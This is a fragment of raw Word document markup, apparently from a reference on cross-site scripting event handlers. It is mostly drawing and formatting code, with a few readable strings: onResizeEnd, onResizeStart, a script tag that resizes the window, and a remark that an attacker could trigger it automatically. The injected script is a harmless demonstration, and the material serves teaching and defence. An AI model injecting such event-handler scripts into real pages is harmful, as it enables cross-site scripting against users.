                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="4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673"/>
          <w:tab w:val="left" w:pos="1674"/>
        </w:tabs>
        <w:spacing w:before="149"/>
        <w:ind w:left="1673" w:hanging="148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6668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263525</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2219960" cy="123190"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="910" name="Group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9960" cy="123190"/>
                          <a:chOff x="1930" y="415"/>
                          <a:chExt cx="3496" cy="194"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="911" name="Freeform 913"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="422"/>
                            <a:ext cx="3439" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5348 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 3439"/>
                              <a:gd name="T2" fmla="+- 0 605 423"/>
                              <a:gd name="T3" fmla="*/ 605 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 3439"/>
                              <a:gd name="T6" fmla="+- 0 605 423"/>
                              <a:gd name="T7" fmla="*/ 605 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 3439"/>
                              <a:gd name="T10" fmla="+- 0 604 423"/>
                              <a:gd name="T11" fmla="*/ 604 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 3439"/>
                              <a:gd name="T14" fmla="+- 0 584 423"/>
                              <a:gd name="T15" fmla="*/ 584 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 3439"/>
                              <a:gd name="T18" fmla="+- 0 580 423"/>
                              <a:gd name="T19" fmla="*/ 580 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 3439"/>
                              <a:gd name="T22" fmla="+- 0 444 423"/>
                              <a:gd name="T23" fmla="*/ 444 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 3439"/>
                              <a:gd name="T26" fmla="+- 0 423 423"/>
                              <a:gd name="T27" fmla="*/ 423 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5348 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 3439"/>
                              <a:gd name="T30" fmla="+- 0 423 423"/>
                              <a:gd name="T31" fmla="*/ 423 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5369 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 3439"/>
                              <a:gd name="T34" fmla="+- 0 444 423"/>
                              <a:gd name="T35" fmla="*/ 444 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5369 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 3439"/>
                              <a:gd name="T38" fmla="+- 0 584 423"/>
                              <a:gd name="T39" fmla="*/ 584 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5351 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 3439"/>
                              <a:gd name="T42" fmla="+- 0 604 423"/>
                              <a:gd name="T43" fmla="*/ 604 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5348 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 3439"/>
                              <a:gd name="T46" fmla="+- 0 605 423"/>
                              <a:gd name="T47" fmla="*/ 60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439" h="183">
                                <a:moveTo>
                                  <a:pt x="341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418" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3439" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3439" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3421" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="341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Text Box 91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415"/>
                            <a:ext cx="3496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1"/>
                                <w:ind w:left="3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&lt;SCRIPT&gt;self.resizeTo(500,400);&lt;/SCRIPT&gt;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1" o:spid="_x0000_s1521" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:20.75pt;width:174.8pt;height:9.7pt;z-index:-15649792;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,415" coordsize="3496,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">
                <v:shape id="Freeform 913" o:spid="_x0000_s1522" style="position:absolute;left:1930;top:422;width:3439;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="34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DkRMUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRSE74X+h/AK3mp2tYhujSKiIr20dQWvz80z&#10;u3TzsiRRt/++KRR6HGbmG2a+7G0rbuRD41hBPsxAEFdON2wUHMvt8xREiMgaW8ek4JsCLBePD3Ms&#10;tLvzJ90O0YgE4VCggjrGrpAyVDVZDEPXESfv4rzFmKQ3Unu8J7ht5SjLJtJiw2mhxo7WNVVfh6tV&#10;MHm/lCv/9rIrTXaKYxx/TDdno9TgqV+9gojUx//wX3uvFczyHH7PpCM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gORExQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m3418,182l21,182r-3,-1l,161r,-4l,21,21,,3418,r21,21l3439,161r-18,20l3418,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3418,605;21,605;18,604;0,584;0,580;0,444;21,423;3418,423;3439,444;3439,584;3421,604;3418,605" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 912" o:spid="_x0000_s1523" type="#_x0000_t202" style="position:absolute;left:1930;top:415;width:3496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el7c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s/EE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Hpe3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1"/>
                          <w:ind w:left="30"/>
                          <w:rPr>
                            <w:sz w:val="16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&lt;SCRIPT&gt;self.resizeTo(500,400);&lt;/SCRIPT&gt;</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="4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1648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98425</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="741045" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="907" name="Group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6205"/>
                          <a:chOff x="1930" y="155"/>
                          <a:chExt cx="1167" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="908" name="Freeform 910"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="155"/>
                            <a:ext cx="1167" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3076 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1167"/>
                              <a:gd name="T2" fmla="+- 0 337 155"/>
                              <a:gd name="T3" fmla="*/ 337 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1167"/>
                              <a:gd name="T6" fmla="+- 0 337 155"/>
                              <a:gd name="T7" fmla="*/ 337 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1167"/>
                              <a:gd name="T10" fmla="+- 0 337 155"/>
                              <a:gd name="T11" fmla="*/ 337 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1167"/>
                              <a:gd name="T14" fmla="+- 0 316 155"/>
                              <a:gd name="T15" fmla="*/ 316 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1167"/>
                              <a:gd name="T18" fmla="+- 0 313 155"/>
                              <a:gd name="T19" fmla="*/ 313 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1167"/>
                              <a:gd name="T22" fmla="+- 0 176 155"/>
                              <a:gd name="T23" fmla="*/ 176 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1167"/>
                              <a:gd name="T26" fmla="+- 0 155 155"/>
                              <a:gd name="T27" fmla="*/ 155 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3076 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1167"/>
                              <a:gd name="T30" fmla="+- 0 155 155"/>
                              <a:gd name="T31" fmla="*/ 155 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3097 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1167"/>
                              <a:gd name="T34" fmla="+- 0 176 155"/>
                              <a:gd name="T35" fmla="*/ 176 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3097 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1167"/>
                              <a:gd name="T38" fmla="+- 0 316 155"/>
                              <a:gd name="T39" fmla="*/ 316 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3079 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1167"/>
                              <a:gd name="T42" fmla="+- 0 337 155"/>
                              <a:gd name="T43" fmla="*/ 337 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3076 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1167"/>
                              <a:gd name="T46" fmla="+- 0 337 155"/>
                              <a:gd name="T47" fmla="*/ 33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67" h="183">
                                <a:moveTo>
                                  <a:pt x="114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146" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1167" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1167" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1149" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="114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Text Box 90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5"/>
                            <a:ext cx="11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onResizeEnd()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08" o:spid="_x0000_s1524" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:7.75pt;width:58.35pt;height:9.15pt;z-index:-17600000;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,155" coordsize="116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">
                <v:shape id="Freeform 910" o:spid="_x0000_s1525" style="position:absolute;left:1930;top:155;width:1167;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="116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k2SsEA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERP3WrCMBS+H/gO4Qy8GTNVhmhnFBWEwtiFPw9waM7a&#10;YnNSkrSNb28uhF1+fP+bXTStGMj5xrKC+SwDQVxa3XCl4HY9fa5A+ICssbVMCh7kYbedvG0w13bk&#10;Mw2XUIkUwj5HBXUIXS6lL2sy6Ge2I07cn3UGQ4KuktrhmMJNKxdZtpQGG04NNXZ0rKm8X3qj4Pd4&#10;iAX+jM7HYui/+o/bWT7uSk3f4/4bRKAY/sUvd6EVrLO0Np1JR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pNkrBAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" path="m1146,182l21,182r-3,l,161r,-3l,21,21,,1146,r21,21l1167,161r-18,21l1146,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1146,337;21,337;18,337;0,316;0,313;0,176;21,155;1146,155;1167,176;1167,316;1149,337;1146,337" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 909" o:spid="_x0000_s1526" type="#_x0000_t202" style="position:absolute;left:1930;top:155;width:116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qhQcUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRSE74L/ITyhN03sQbqrUUQsFArFdXvo8bl5&#10;7gY3L+sm1e2/N4VCj8PMfMOsNoNrxY36YD1rmM8UCOLKG8u1hs/ydfoCIkRkg61n0vBDATbr8WiF&#10;ufF3Luh2jLVIEA45amhi7HIpQ9WQwzDzHXHyzr53GJPsa2l6vCe4a+WzUgvp0HJaaLCjXUPV5fjt&#10;NGy/uNjb68fpUJwLW5aZ4vfFReunybBdgog0xP/wX/vNaMhUBr9n0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qFB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onResizeEnd()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7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>would</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>resize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window;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>auto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>initialize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>something</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>like: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842"/>
          <w:tab w:val="left" w:pos="1843"/>
        </w:tabs>
        <w:spacing w:before="131" w:after="62"/>
        <w:ind w:left="1842" w:hanging="1653"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>would</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>resize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window;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>auto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>initialize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>something</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:line="193" w:lineRule="exact"/>
        <w:ind w:left="470"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:position w:val="-3"/>
          <w:sz w:val="19"/>
          <w:lang w:val="tr-TR" w:eastAsia="tr-TR"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="2219960" cy="123190"/>
                <wp:effectExtent l="6350" t="1270" r="2540" b="0"/>
                <wp:docPr id="904" name="Group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9960" cy="123190"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3496" cy="194"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="905" name="Freeform 907"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="7"/>
                            <a:ext cx="3439" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 3417 w 3439"/>
                              <a:gd name="T1" fmla="+- 0 190 7"/>
                              <a:gd name="T2" fmla="*/ 190 h 183"/>
                              <a:gd name="T3" fmla="*/ 21 w 3439"/>
                              <a:gd name="T4" fmla="+- 0 190 7"/>
                              <a:gd name="T5" fmla="*/ 190 h 183"/>
                              <a:gd name="T6" fmla="*/ 18 w 3439"/>
                              <a:gd name="T7" fmla="+- 0 189 7"/>
                              <a:gd name="T8" fmla="*/ 189 h 183"/>
                              <a:gd name="T9" fmla="*/ 0 w 3439"/>
                              <a:gd name="T10" fmla="+- 0 169 7"/>
                              <a:gd name="T11" fmla="*/ 169 h 183"/>
                              <a:gd name="T12" fmla="*/ 0 w 3439"/>
                              <a:gd name="T13" fmla="+- 0 165 7"/>
                              <a:gd name="T14" fmla="*/ 165 h 183"/>
                              <a:gd name="T15" fmla="*/ 0 w 3439"/>
                              <a:gd name="T16" fmla="+- 0 29 7"/>
                              <a:gd name="T17" fmla="*/ 29 h 183"/>
                              <a:gd name="T18" fmla="*/ 21 w 3439"/>
                              <a:gd name="T19" fmla="+- 0 7 7"/>
                              <a:gd name="T20" fmla="*/ 7 h 183"/>
                              <a:gd name="T21" fmla="*/ 3417 w 3439"/>
                              <a:gd name="T22" fmla="+- 0 7 7"/>
                              <a:gd name="T23" fmla="*/ 7 h 183"/>
                              <a:gd name="T24" fmla="*/ 3438 w 3439"/>
                              <a:gd name="T25" fmla="+- 0 29 7"/>
                              <a:gd name="T26" fmla="*/ 29 h 183"/>
                              <a:gd name="T27" fmla="*/ 3438 w 3439"/>
                              <a:gd name="T28" fmla="+- 0 169 7"/>
                              <a:gd name="T29" fmla="*/ 169 h 183"/>
                              <a:gd name="T30" fmla="*/ 3420 w 3439"/>
                              <a:gd name="T31" fmla="+- 0 189 7"/>
                              <a:gd name="T32" fmla="*/ 189 h 183"/>
                              <a:gd name="T33" fmla="*/ 3417 w 3439"/>
                              <a:gd name="T34" fmla="+- 0 190 7"/>
                              <a:gd name="T35" fmla="*/ 190 h 18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439" h="183">
                                <a:moveTo>
                                  <a:pt x="3417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3417" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3438" y="22"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3438" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3420" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3417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Text Box 90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496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1"/>
                                <w:ind w:left="3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&lt;SCRIPT&gt;self.resizeTo(500,400);&lt;/SCRIPT&gt;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05" o:spid="_x0000_s1527" style="width:174.8pt;height:9.7pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="3496,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">
                <v:shape id="Freeform 907" o:spid="_x0000_s1528" style="position:absolute;top:7;width:3439;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="34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J0msUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRSE74X+h/AKvdWk1YpujSKlLdJL1RW8PjfP&#10;7NLNy5Kkuv57Uyj0OMzMN8xs0btWnCjExrOGx4ECQVx507DVsCvfHyYgYkI22HomDReKsJjf3syw&#10;MP7MGzptkxUZwrFADXVKXSFlrGpyGAe+I87e0QeHKctgpQl4znDXyielxtJhw3mhxo5ea6q+tz9O&#10;w/jrWC7D5+ijtGqfhjhcT94OVuv7u375AiJRn/7Df+2V0TBVz/B7Jh8BOb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YnSaxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m3417,183l21,183r-3,-1l,162r,-4l,22,21,,3417,r21,22l3438,162r-18,20l3417,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3417,190;21,190;18,189;0,169;0,165;0,29;21,7;3417,7;3438,29;3438,169;3420,189;3417,190" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 906" o:spid="_x0000_s1529" type="#_x0000_t202" style="position:absolute;width:3496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U1M8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRSE7wX/Q3iCt5rUw6Jbo0hREITSdXvo8XXz&#10;3A1uXtZN1O2/b4RCj8PMfMMs14NrxY36YD1reJkqEMSVN5ZrDZ/l7nkOIkRkg61n0vBDAdar0dMS&#10;c+PvXNDtGGuRIBxy1NDE2OVShqohh2HqO+LknXzvMCbZ19L0eE9w18qZUpl0aDktNNjRW0PV+Xh1&#10;GjZfXGzt5f37ozgVtiwXig/ZWevJeNi8gog0xP/wX3tvNCxUBo8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ZTUz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1"/>
                          <w:ind w:left="30"/>
                          <w:rPr>
                            <w:sz w:val="16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&lt;SCRIPT&gt;self.resizeTo(500,400);&lt;/SCRIPT&gt;</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="4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420"/>
          <w:tab w:val="left" w:pos="1421"/>
        </w:tabs>
        <w:spacing w:before="160" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="464" w:right="871" w:hanging="27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1699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-280035</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="848995" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="901" name="Group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8995" cy="116205"/>
                          <a:chOff x="1930" y="-441"/>
                          <a:chExt cx="1337" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="902" name="Freeform 904"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="-442"/>
                            <a:ext cx="1337" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3246 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1337"/>
                              <a:gd name="T2" fmla="+- 0 -259 -441"/>
                              <a:gd name="T3" fmla="*/ -259 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1337"/>
                              <a:gd name="T6" fmla="+- 0 -259 -441"/>
                              <a:gd name="T7" fmla="*/ -259 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1337"/>
                              <a:gd name="T10" fmla="+- 0 -260 -441"/>
                              <a:gd name="T11" fmla="*/ -260 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1337"/>
                              <a:gd name="T14" fmla="+- 0 -280 -441"/>
                              <a:gd name="T15" fmla="*/ -280 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1337"/>
                              <a:gd name="T18" fmla="+- 0 -283 -441"/>
                              <a:gd name="T19" fmla="*/ -283 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1337"/>
                              <a:gd name="T22" fmla="+- 0 -420 -441"/>
                              <a:gd name="T23" fmla="*/ -420 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1337"/>
                              <a:gd name="T26" fmla="+- 0 -441 -441"/>
                              <a:gd name="T27" fmla="*/ -441 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3246 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1337"/>
                              <a:gd name="T30" fmla="+- 0 -441 -441"/>
                              <a:gd name="T31" fmla="*/ -441 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3267 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1337"/>
                              <a:gd name="T34" fmla="+- 0 -420 -441"/>
                              <a:gd name="T35" fmla="*/ -420 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3267 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1337"/>
                              <a:gd name="T38" fmla="+- 0 -280 -441"/>
                              <a:gd name="T39" fmla="*/ -280 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3249 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1337"/>
                              <a:gd name="T42" fmla="+- 0 -260 -441"/>
                              <a:gd name="T43" fmla="*/ -260 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3246 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1337"/>
                              <a:gd name="T46" fmla="+- 0 -259 -441"/>
                              <a:gd name="T47" fmla="*/ -25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7" h="183">
                                <a:moveTo>
                                  <a:pt x="131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16" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1337" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1337" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1319" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="131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Text Box 90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-442"/>
                            <a:ext cx="133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onResizeStart()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02" o:spid="_x0000_s1530" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:-22.05pt;width:66.85pt;height:9.15pt;z-index:-17599488;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,-441" coordsize="133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">
